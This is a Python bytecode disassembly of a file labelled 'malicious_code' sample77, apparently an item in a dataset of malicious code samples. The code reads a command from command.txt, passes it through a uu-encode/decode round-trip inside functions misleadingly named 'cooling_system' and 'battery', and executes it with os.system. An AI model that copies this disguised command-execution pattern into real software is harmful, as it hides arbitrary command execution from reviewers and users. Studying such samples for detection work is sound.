  1           0 LOAD_CONST               0 (0)
              2 LOAD_CONST               1 (None)
              4 IMPORT_NAME              0 (os)
              6 STORE_NAME               0 (os)

  2           8 LOAD_CONST               0 (0)
             10 LOAD_CONST               1 (None)
             12 IMPORT_NAME              1 (uu)
             14 STORE_NAME               1 (uu)

  3          16 LOAD_CONST               0 (0)
             18 LOAD_CONST               1 (None)
             20 IMPORT_NAME              2 (io)
             22 STORE_NAME               2 (io)

  5          24 LOAD_CONST               2 (<code object get_command_from_file at 0x10b9998f0, file "malicious_code/py/Listing1/sample77.py", line 5>)
             26 LOAD_CONST               3 ('get_command_from_file')
             28 MAKE_FUNCTION            0
             30 STORE_NAME               3 (get_command_from_file)

  9          32 LOAD_CONST               4 (<code object cooling_system at 0x10b9999a0, file "malicious_code/py/Listing1/sample77.py", line 9>)
             34 LOAD_CONST               5 ('cooling_system')
             36 MAKE_FUNCTION            0
             38 STORE_NAME               4 (cooling_system)

 15          40 LOAD_CONST               6 (<code object battery at 0x10b999a50, file "malicious_code/py/Listing1/sample77.py", line 15>)
             42 LOAD_CONST               7 ('battery')
             44 MAKE_FUNCTION            0
             46 STORE_NAME               5 (battery)

 22          48 LOAD_NAME                3 (get_command_from_file)
             50 CALL_FUNCTION            0
             52 STORE_NAME               6 (command)

 23          54 LOAD_NAME                4 (cooling_system)
             56 LOAD_NAME                6 (command)
             58 CALL_FUNCTION            1
             60 STORE_NAME               7 (encoded_command)

 24          62 LOAD_NAME                5 (battery)
             64 LOAD_NAME                7 (encoded_command)
             66 CALL_FUNCTION            1
             68 POP_TOP
             70 LOAD_CONST               1 (None)
             72 RETURN_VALUE

Disassembly of <code object get_command_from_file at 0x10b9998f0, file "malicious_code/py/Listing1/sample77.py", line 5>:
  6           0 LOAD_GLOBAL              0 (open)
              2 LOAD_CONST               1 ('command.txt')
              4 LOAD_CONST               2 ('r')
              6 CALL_FUNCTION            2
              8 SETUP_WITH              14 (to 38)
             10 STORE_FAST               0 (file)

  7          12 LOAD_FAST                0 (file)
             14 LOAD_METHOD              1 (read)
             16 CALL_METHOD              0
             18 LOAD_METHOD              2 (strip)
             20 CALL_METHOD              0

  6          22 POP_BLOCK
             24 ROT_TWO
             26 LOAD_CONST               0 (None)
             28 DUP_TOP
             30 DUP_TOP
             32 CALL_FUNCTION            3
             34 POP_TOP
             36 RETURN_VALUE
        >>   38 WITH_EXCEPT_START
             40 POP_JUMP_IF_TRUE        22 (to 44)
             42 RERAISE                  1
        >>   44 POP_TOP
             46 POP_TOP
             48 POP_TOP
             50 POP_EXCEPT
             52 POP_TOP
             54 LOAD_CONST               0 (None)
             56 RETURN_VALUE

Disassembly of <code object cooling_system at 0x10b9999a0, file "malicious_code/py/Listing1/sample77.py", line 9>:
 10           0 LOAD_GLOBAL              0 (io)
              2 LOAD_METHOD              1 (BytesIO)
              4 LOAD_FAST                0 (cmd)
              6 LOAD_METHOD              2 (encode)
              8 CALL_METHOD              0
             10 CALL_METHOD              1
             12 STORE_FAST               1 (input_io)

 11          14 LOAD_GLOBAL              0 (io)
             16 LOAD_METHOD              1 (BytesIO)
             18 CALL_METHOD              0
             20 STORE_FAST               2 (output_io)

 12          22 LOAD_GLOBAL              3 (uu)
             24 LOAD_METHOD              2 (encode)
             26 LOAD_FAST                1 (input_io)
             28 LOAD_FAST                2 (output_io)
             30 CALL_METHOD              2
             32 POP_TOP

 13          34 LOAD_FAST                2 (output_io)
             36 LOAD_METHOD              4 (getvalue)
             38 CALL_METHOD              0
             40 LOAD_METHOD              5 (decode)
             42 CALL_METHOD              0
             44 RETURN_VALUE

Disassembly of <code object battery at 0x10b999a50, file "malicious_code/py/Listing1/sample77.py", line 15>:
 16           0 LOAD_GLOBAL              0 (io)
              2 LOAD_METHOD              1 (BytesIO)
              4 LOAD_FAST                0 (encoded_cmd)
              6 LOAD_METHOD              2 (encode)
              8 CALL_METHOD              0
             10 CALL_METHOD              1
             12 STORE_FAST               1 (input_io)

 17          14 LOAD_GLOBAL              0 (io)
             16 LOAD_METHOD              1 (BytesIO)
             18 CALL_METHOD              0
             20 STORE_FAST               2 (output_io)

 18          22 LOAD_GLOBAL              3 (uu)
             24 LOAD_METHOD              4 (decode)
             26 LOAD_FAST                1 (input_io)
             28 LOAD_FAST                2 (output_io)
             30 CALL_METHOD              2
             32 POP_TOP

 19          34 LOAD_FAST                2 (output_io)
             36 LOAD_METHOD              5 (getvalue)
             38 CALL_METHOD              0
             40 LOAD_METHOD              4 (decode)
             42 CALL_METHOD              0
             44 STORE_FAST               3 (decoded_cmd)

 20          46 LOAD_GLOBAL              6 (os)
             48 LOAD_METHOD              7 (system)
             50 LOAD_FAST                3 (decoded_cmd)
             52 CALL_METHOD              1
             54 POP_TOP
             56 LOAD_CONST               0 (None)
             58 RETURN_VALUE
